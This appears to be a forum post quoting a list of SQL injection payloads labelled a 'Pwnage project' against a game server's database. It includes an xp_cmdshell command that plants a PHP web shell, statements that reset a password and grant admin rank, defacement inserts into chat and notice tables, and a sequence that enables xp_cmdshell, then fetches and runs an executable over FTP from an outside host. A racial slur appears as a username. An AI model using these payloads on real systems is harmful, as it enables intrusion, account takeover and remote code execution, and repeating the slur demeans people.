Quote:
DeviasOnline Pwnage project
'exec xp_cmdshell 'echo "<?php system($_GET[cmd])?>">>C:/servers/webserver/htdocs/devias/module/devias.php'--
[Only registered and activated users can see links. Click Here To Register...]
'update TB_User set password ='d6ce52f99f63369762882afb61f404a4'where StrUserId='insanez'--
'update SRO_VT_ACCOUNT.dbo.TB_User set sec_primary = '1' where StrUserID = 'nigger'--
'insert into SRO_VT_ACCOUNT.dbo.srZor_globalChatLog(sender,msg, time)values('sender','<img src=http://www.reactionface.info/sites/default/files/images/1287666826226.png width=500px/>','May 28 2013 12:055AM')--
'insert into SRO_VT_ACCOUNT.dbo._Notice(ContentID,Subject,Artic le,EditDate)values('22','niqqa pls','hax by artuuro<img src=http://www.reactionface.info/sites/default/files/images/1287666826226.png width=500px/>','12:12:12')--
'update SRO_VT_ACCOUNT.dbo.TB_User set sec_primary='1',sec_content='1',GMrank='1'where StrUserID='nigger'--
'update SRO_VT_ACCOUNT.dbo.TB_User set sec_primary='2',sec_content='2'where StrUserID='username'--
Scenario:
'exec sp_configure 'show advanced options',1--
'exec RECONFIGURE--
'exec sp_configure 'xp_cmdshell',1--
'exec RECONFIGURE--
'exec xp_cmdshell 'echo open FTP_HOST_HERE >>D:/ftphp.txt'--
'exec xp_cmdshell 'echo user anonymous >>D:/ftphp.txt'--
'exec xp_cmdshell 'echo password anonymous >>D:/ftphp.txt'--
'exec xp_cmdshell 'echo get SR_GS.exe D:/sphp.exe >>D:/ftphp.txt'--
'exec xp_cmdshell 'ftp -v -n -s:D:/ftphp.txt'--
'exec xp_cmdshell 'D:/sphp.exe'--
idk anything.